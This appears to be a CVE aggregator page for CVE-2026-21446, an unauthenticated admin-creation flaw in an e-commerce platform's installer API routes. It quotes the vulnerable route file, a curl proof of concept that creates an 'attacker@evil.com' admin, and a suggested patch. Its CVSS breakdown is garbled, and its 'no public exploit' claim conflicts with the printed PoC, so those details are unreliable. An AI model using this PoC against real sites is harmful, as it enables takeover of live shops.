What is CVE-2026-21446?

### Vulnerable Code **File:** `packages/Ibkul/Installer/src/Routes/Ib.php` ``` group(function () { Route::controller(InstallerController::class)-\>group(function () { Route::get('install', 'index')-\>name('installer.index'); Route::middleware(StartSession::class)-\>prefix('install/api')-\>group(function () { Route::post('env-file-setup', 'envFileSetup')-\>name('installer.env\_file\_setup'); Route::post('run-migration', 'runMigration')-\>name('installer.run\_migration')-\>withoutMiddleware('Ib'); Route::post('run-seeder', 'runSeeder')-\>name('installer.run\_seeder')-\>withoutMiddleware('Ib'); Route::get('download-sample', 'downloadSample')-\>name('installer.download\_sample')-\>withoutMiddleware('Ib'); Route::post('admin-config-setup', 'adminConfigSetup')-\>name('installer.admin\_config\_setup')-\>withoutMiddleware('Ib'); Route::post('sample-products-setup', 'createSampleProducts')-\>name('installer.sample\_products\_setup')-\>withoutMiddleware('Ib'); }); }); }); ``` API routes remain active even after initial installation is complete, allowing any unauthenticated attacker to: - Create admin accounts - Modify application configuration - Potentially overwrite existing data the underlying **API endpoints** (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. ### How to Reproduce 1. The Ib installer UI at `http://localhost:8000/install` has client-side protections 2. **However, the API endpoints are directly exploitable:** - The attack works by calling `/install/api/admin-config-setup` directly via curl/HTTP client - No CSRF token, session, or authentication is required - The Ib UI workflow is completely bypassed ### Proof of Concept ``` #!/bin/bash # PoC: Create admin account without authentication TARGET="http://localhost:8000" # Create a new admin account curl -X POST "$TARGET/install/api/admin-config-setup" \ -H "Content-Type: application/json" \ -d '{ "admin_name": "Attacker", "admin_email": "attacker@evil.com", "admin_password": "HackedPassword123" }' echo "" echo "New admin account created!" echo "Login at: $TARGET/admin" echo "Email: attacker@evil.com" ``` ### Expected Result The API should reject unauthenticated requests with 401/403 status. ### Actual Result The API accepts the request and creates a new admin account, allowing full administrative access to the e-commerce platform. ### Recommended Patch Add installation completion check ``` // In InstallerController.php or a new middleware public function __construct() { // Check if application is already installed if (file_exists(base_path('.env')) && config('app.key') && \Schema::hasTable('admins') && \DB::table('admins')->count() > 0) { abort(404, 'Application already installed'); } } ```

What is the severity of CVE-2026-21446?

CVE-2026-21446 has a CVSS v3 score of 9.8, which is classified as Critical severity.

Is there an exploit available for CVE-2026-21446?

No known public exploits are currently available for CVE-2026-21446.

Is there a patch available for CVE-2026-21446?

Yes, patches are available for CVE-2026-21446. Check the vendor advisories for update instructions.

CVE-2026-21446 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v39.8

CVSS v20.0

Priority Score717.0

EPSS Score0.0

Critical

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

9.8

CVSS

No

Exploit

Yes

Patch

Medium Priority

critical severity

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Vulnerable Code

File: packages/Ibkul/Installer/src/Routes/Ib.php

<?php

use Illuminate\\Session\\Middleware\\StartSession;  
use Illuminate\\Support\\Facades\\Route;  
use Ibkul\\Installer\\Http\\Controllers\\InstallerController;

Route::middleware(\['Ib', 'installer\_locale'\])-\>group(function () {  
    Route::controller(InstallerController::class)-\>group(function () {  
        Route::get('install', 'index')-\>name('installer.index');

        Route::middleware(StartSession::class)-\>prefix('install/api')-\>group(function () {  
            Route::post('env-file-setup', 'envFileSetup')-\>name('installer.env\_file\_setup');  
            Route::post('run-migration', 'runMigration')-\>name('installer.run\_migration')-\>withoutMiddleware('Ib');  
            Route::post('run-seeder', 'runSeeder')-\>name('installer.run\_seeder')-\>withoutMiddleware('Ib');  
            Route::get('download-sample', 'downloadSample')-\>name('installer.download\_sample')-\>withoutMiddleware('Ib');  
            Route::post('admin-config-setup', 'adminConfigSetup')-\>name('installer.admin\_config\_setup')-\>withoutMiddleware('Ib');  
            Route::post('sample-products-setup', 'createSampleProducts')-\>name('installer.sample\_products\_setup')-\>withoutMiddleware('Ib');  
        });  
    });  
});

API routes remain active even after initial installation is complete, allowing any unauthenticated attacker to:

Create admin accounts
Modify application configuration
Potentially overwrite existing data

the underlying API endpoints (/install/api/*) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly.

How to Reproduce

The Ib installer UI at http://localhost:8000/install has client-side protections
However, the API endpoints are directly exploitable:
- The attack works by calling /install/api/admin-config-setup directly via curl/HTTP client
- No CSRF token, session, or authentication is required
- The Ib UI workflow is completely bypassed

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Network

User Interaction:Network

Scope:Unchanged

Confidentiality:High

Integrity:High

Availability:High

Patch References

Github.com Security [email protected]